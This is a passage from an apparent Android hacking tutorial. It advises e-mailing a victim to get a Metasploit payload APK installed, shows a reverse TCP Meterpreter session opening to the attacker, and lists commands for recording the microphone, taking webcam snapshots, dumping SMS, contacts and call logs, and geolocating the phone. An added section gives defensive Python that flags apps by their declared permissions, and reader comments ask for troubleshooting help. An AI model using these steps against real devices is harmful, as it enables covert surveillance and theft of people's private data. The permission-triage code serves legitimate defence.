In a real scenario, you could e-mail the victim asking them to download and install the app. In our case, we upload the APK to a VM and install it there.
Once it is installed, open the app “Main Activity”.
Upon opening the app, we get a Meterpreter session on our Kali Linux machine, as shown below:
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.202.129
[*] Meterpreter session 1 opened (192.168.202.128:4444 -> 192.168.202.129:48620) at 2017-04-05 21:37:50 +0000

meterpreter >
Type the sysinfo command at the meterpreter prompt to get details about the phone.
meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.3 - Linux 3.10.2-android-x86+ (i686)
Meterpreter : java/android
meterpreter >
You can use the list of commands below to hack Android. The descriptions are self-explanatory. You can also use the help command at the meterpreter prompt for details about them.
Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wlan_geolocate    Get current lat-long using WLAN information
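Seen from the defender's side, each data-access command in the list above depends on an Android permission that the installed app must declare. The Python example below is added here and is not from the original article or from Metasploit; it reads a decoded AndroidManifest.xml and reports which of the listed commands the declared permissions would allow. The command-to-permission mapping, the threshold of 4 and the sample manifest are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Assumed mapping (not from the original page): command from the list above ->
# Android permission the platform requires for that kind of access.
COMMAND_PERMISSIONS = {
    "record_mic": "android.permission.RECORD_AUDIO",
    "webcam_snap": "android.permission.CAMERA",
    "webcam_stream": "android.permission.CAMERA",
    "dump_calllog": "android.permission.READ_CALL_LOG",
    "dump_contacts": "android.permission.READ_CONTACTS",
    "dump_sms": "android.permission.READ_SMS",
    "send_sms": "android.permission.SEND_SMS",
    "geolocate": "android.permission.ACCESS_FINE_LOCATION",
    "wlan_geolocate": "android.permission.ACCESS_WIFI_STATE",
}

def requested_permissions(manifest_xml):
    """Return the permission names declared in a decoded AndroidManifest.xml."""
    if "<!DOCTYPE" in manifest_xml:  # decoded manifests carry no DTD; refuse entity tricks
        raise ValueError("unexpected DTD in manifest")
    root = ET.fromstring(manifest_xml)
    names = (el.get(ANDROID_NS + "name") for el in root.iter("uses-permission"))
    return {n for n in names if n}

def triage(manifest_xml, threshold=4):
    """List the commands the declared permissions would allow and flag broad requests."""
    declared = requested_permissions(manifest_xml)
    commands = sorted(c for c, p in COMMAND_PERMISSIONS.items() if p in declared)
    sensitive = {COMMAND_PERMISSIONS[c] for c in commands}
    # threshold is an arbitrary cut-off chosen for this example
    return {"commands": commands, "suspicious": len(sensitive) >= threshold}

# Constructed sample manifest (text form, as produced by a decoder such as apktool).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="MainActivity"/>
</manifest>"""

if __name__ == "__main__":
    print(triage(SAMPLE_MANIFEST))
```

An app that asks for SMS, contacts, microphone and camera access together while presenting only a bare “Main Activity” is a reasonable candidate for closer inspection before it is allowed on a managed device.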
stuntfamz says
The session just ends after less than 10 seconds. How can I solve this issue?
noone says
How to install jarsigner in Kali Linux Lite?